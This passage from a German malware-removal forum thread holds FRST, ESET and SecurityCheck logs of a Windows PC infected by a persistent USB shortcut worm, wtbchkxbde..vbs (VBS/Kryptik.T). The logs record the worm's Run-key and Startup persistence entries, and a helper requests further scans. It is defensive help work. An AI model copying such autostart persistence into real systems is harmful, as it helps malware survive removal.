HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
==================== Internet (Whitelisted) ====================
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]
==================== Services (Whitelisted) =================
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)
==================== Drivers (Whitelisted) ====================
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
==================== NetSvcs (Whitelisted) ===================
==================== One Month Created Files and Folders ========
2014-04-17 00:04 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-17 00:04 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu
==================== One Month Modified Files and Folders =======
2014-04-17 00:05 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 00:04 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-17 00:02 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-17 00:01 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-17 00:01 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-17 00:01 - 2009-07-14 06:51 - 00088288 _____ () C:\Windows\setupact.log
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-17 00:00 - 2013-04-16 19:13 - 01625695 _____ () C:\Windows\WindowsUpdate.log
2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt
2014-04-16 23:30 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-14 11:21 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-14 11:21 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-14 11:21 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu
Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
LastRegBack: 2014-03-24 00:49
==================== End Of Log ============================
|
|
17.04.2014, 19:35
| #8 |
| /// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbsESET Online Scanner
Downloade Dir bitte  SecurityCheck und:
und ein frisches FRST log bitte. Noch Probleme?
__________________ gruß, schrauber Proud Member of UNITE and ASAP since 2009 Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM! |
|
17.04.2014, 22:48
| #9 |
| | Flash Drive Shortcut Virus wtbchkxbde..vbs Habe alles so gemacht wie geschildert, aber dadurch wurde ja jetzt nichts entfernt oder? Virus ist weiterhin vorhanden, sichtbar auch im FRST-Log, die .vbs erscheint nach formatieren wieder auf dem USB-Stick, auch wenn der Pfad im ESET-Log nicht auftaucht ESET-Log: Code:
ATTFilter ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=ac2dffd99c948343bad200af6691bd9b
# engine=17931
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-04-17 08:53:19
# local_time=2014-04-17 10:53:19 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1033
# osver=6.1.7600 NT
# compatibility_mode=1799 16775165 100 96 2348631 31625798 2958932 0
# compatibility_mode=5893 16776574 100 94 31600355 149397849 0 0
# scanned=203094
# found=4
# cleaned=0
# scan_time=5260
sh=410B32FD3FE4642644AD91AC60C69B86EC2762DD ft=1 fh=0e378a435beab91a vn="a variant of Win32/Adware.Yontoo.B application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Tarma Installer\{361E80BE-388B-4270-BF54-A10C2B756504}\_Setupx.dll.vir"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs"
sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\Desktop\Antivir\Trojanerboard\wtbchkxbde..txt"
Code:
ATTFilter Results of screen317's Security Check version 0.99.81
Windows 7 x64 (UAC is disabled!)
Out of date service pack!!
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Avira Desktop
Antivirus out of date! (On Access scanning disabled!)
`````````Anti-malware/Other Utilities Check:`````````
Adobe Flash Player 10 Flash Player out of Date!
Adobe Reader 9 Adobe Reader out of Date!
Mozilla Thunderbird (24.3.0)
Google Chrome 33.0.1750.146
Google Chrome 33.0.1750.154
````````Process Check: objlist.exe by Laurent````````
Avira Antivir avgnt.exe
Avira Antivir avguard.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C:
````````````````````End of Log``````````````````````
FRST: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 23:36:08
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
